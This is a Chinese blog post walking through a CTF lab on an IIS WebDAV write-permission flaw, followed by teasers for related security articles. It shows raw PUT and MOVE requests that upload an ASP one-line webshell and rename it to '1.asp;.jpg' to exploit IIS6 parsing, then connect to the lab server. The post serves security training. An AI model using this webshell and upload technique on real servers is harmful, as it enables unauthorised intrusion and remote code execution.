CTF-IIS写权限漏洞分析溯源

最新推荐文章于 2020-10-13 14:59:44 发布
原创 最新推荐文章于 2020-10-13 14:59:44 发布 · 761 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了由于服务器配置不当引发的IIS写权限漏洞,重点介绍了如何利用IIS PUT Scanner进行扫描。通过修改HTTP请求为OPTIONS,发现服务器允许PUT和MOVE操作。进一步利用PUT方法写入一句话木马,并通过rename技巧将文件变为1.asp;.jpg,最终通过菜刀连接获取关键信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

根据题意
在这里插入图片描述
原因:来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了
webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。
用burp抓包修改写入,修改GET为OPTIONS
在这里插入图片描述
发现Allow部分有PUT和MOVE
然后利用PUT写入一句话木马到一个文件里面
更改或增加以下
PUT /2.txt HTTP/1.1
<%eval request(“cmd”)%>
在这里插入图片描述
返回不是bad request或者404就行
更改一句名称,利用iis漏洞,我们更名为1.asp;.jpg,burp写入
更改或增加以下
MOVE /2.txt HTTP/1.1
Destination: /1.asp;.jpg
<%eval request(“tdl”)%>
在这里插入图片描述
返回401,不影响
菜刀连接,地址:http://219.153.49.228:44601/1.asp;.jpg密码:cmd,获得key
在这里插入图片描述

最低0.47元/天 解锁文章

200万优质内容无限畅学
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
墨者学院 - IIS权限漏洞分析溯源
多崎巡礼的博客
08-29 1508
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描漏洞iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。     iis scan工具链接 链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54 ...
Iis权限漏洞认识
weixin_34313182的博客
10-13 250
Iis权限漏洞是由于iis的网站主目录权限设置不当造成的,严格来说不属于iis漏洞。网站主目录设置可权限,可直接往服务器上文件,漏洞威胁级别较高。 漏洞成可利用的条件 1、 网站主目录权限允许入和脚本资源访问。如果只有权限,利用时只能上传txt文件,使用move方法将txt文件改正可执行脚本,需要脚本资源访问权限。 2、 WebDAV服务器扩...
IIS权限漏洞
05-03
IIS权限漏洞,discua建须搭知与漏洞不全
IIS权限漏洞 (HTTP PUT方法利用)
dieman0446的博客
12-02 933
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描漏洞iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 具体的原理在这个链接里。 http://www.2cto.com/Article/201307/228165.html 这个帖子是以前在法客里...
墨者_IIS权限漏洞分析溯源
weixin_50698958的博客
10-13 448
靶场: https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe 背景介绍 某日,安全工程师"墨者"对一内网进行授权扫描,在扫描过程中,发现了一台Windows2003的服务器,开启了web服务,业主单位员工坚称是一个调试服务器,只安装IIS6.0,无任何代码程序,不可能会有安全问题。"墨者"一听就来劲了,拿起工具,手起刀落~~~~~~ 实训目标 1、了解IIS WebDAV安全配置; 2、了解HTT
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
墨者学院-IIS权限漏洞分析溯源
臭nana的博客
12-18 627
利用burpsuit抓包 发送到repeater 将GET改成OPTIONS 发现Allow部分有PUT和MOVE 然后利用PUT入一句话木马到一个文件里面 利用iis6文件解析漏洞,用MOVE改文件后缀名为.asp;.jpg 菜刀连接 拿到key ...
IIS权限漏洞工具
10-19
IIS权限漏洞工具 IIS权限漏洞工具
渗透入侵\IIS权限漏洞.zip
07-15
渗透入侵\IIS权限漏洞
【WEB】IIS权限漏洞分析溯源
HAPPY
08-19 1299
【原题】https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe 【解法】 1.首先iis scaner发现有put漏洞,但是无法用工具注入。 2.尝试用burp抓包修改入  PUT /test.txt HTTP/1.1 Host: 219.153.49.228:43672 Pragma: ...
利用IIS权限漏洞
qq_35266419的博客
10-11 815
题目 目标服务器开启了IIS服务,搭建了一个网站。已知该网站的管理人员比较粗心且经验不足,没有IIS权限进行必要的防范。请利用该权限漏洞,对目标网站进行渗透并找到key.txt文件,将文件内容作为FLAG值进行提交。 题目分析 1.IIS (互联网信息服务) ①IIS是Internet Information Services的缩,意为互联网信息服务,是由微软公司提供的基于运行Micros...
科普文之iis权限漏洞
ccx_john的专栏
07-11 2627
今天特意跑到学校听了一堂课,然后学了很多东西,就一个笔记,分享一下吧。都是本地环境,没有真实环境,我小白,别喷我。 Iis权限漏洞 说明:这个漏洞的产生原因来源于服务器配置不当 演示: 利用IIS PUT Scaner扫描漏洞iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持P
CTF-网络数据分析溯源(DNS服务器地址)
asd158923328的博客
08-24 2383
根据题意 进入环境,下载文件,用wireshark加载 wireshark筛选udp.port==53或者DNS 使用率最高的就是DNS服务器地址 验证ip获得key
CTF-BeesCMS系统漏洞分析溯源
asd158923328的博客
08-21 4876
根据题意 漏洞原因:因为BeesCMS后台登陆页面存在sql注入,可以被用来入一句话木马或者查看管理员密码 进入环境,通过御剑工具扫描网站目录,发现/admin/login.php 首先在用户名 中 输入 ‘ 出现了报错, 确认后台登陆页面的user 有存在sql注入。 然后输入 ‘ or 1=1 # 就返回了正常的登陆失败的页面。 sql 回显可以看出有五个字段 所以尝试 ‘ unio...
CTF-网络数据分析溯源(端口扫描的IP地址)
asd158923328的博客
08-25 1607
根据题意 进入环境,下载文件,用wireshark打开 过滤命令进行过滤端口,连接最频繁的就是ip,验证ip得到key
CTF-日志文件分析溯源(爆破者的IP地址)
asd158923328的博客
08-25 2883
根据题意 进入环境,下载文件,用wireshark打开 检索login.php得到ip验证得到key
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值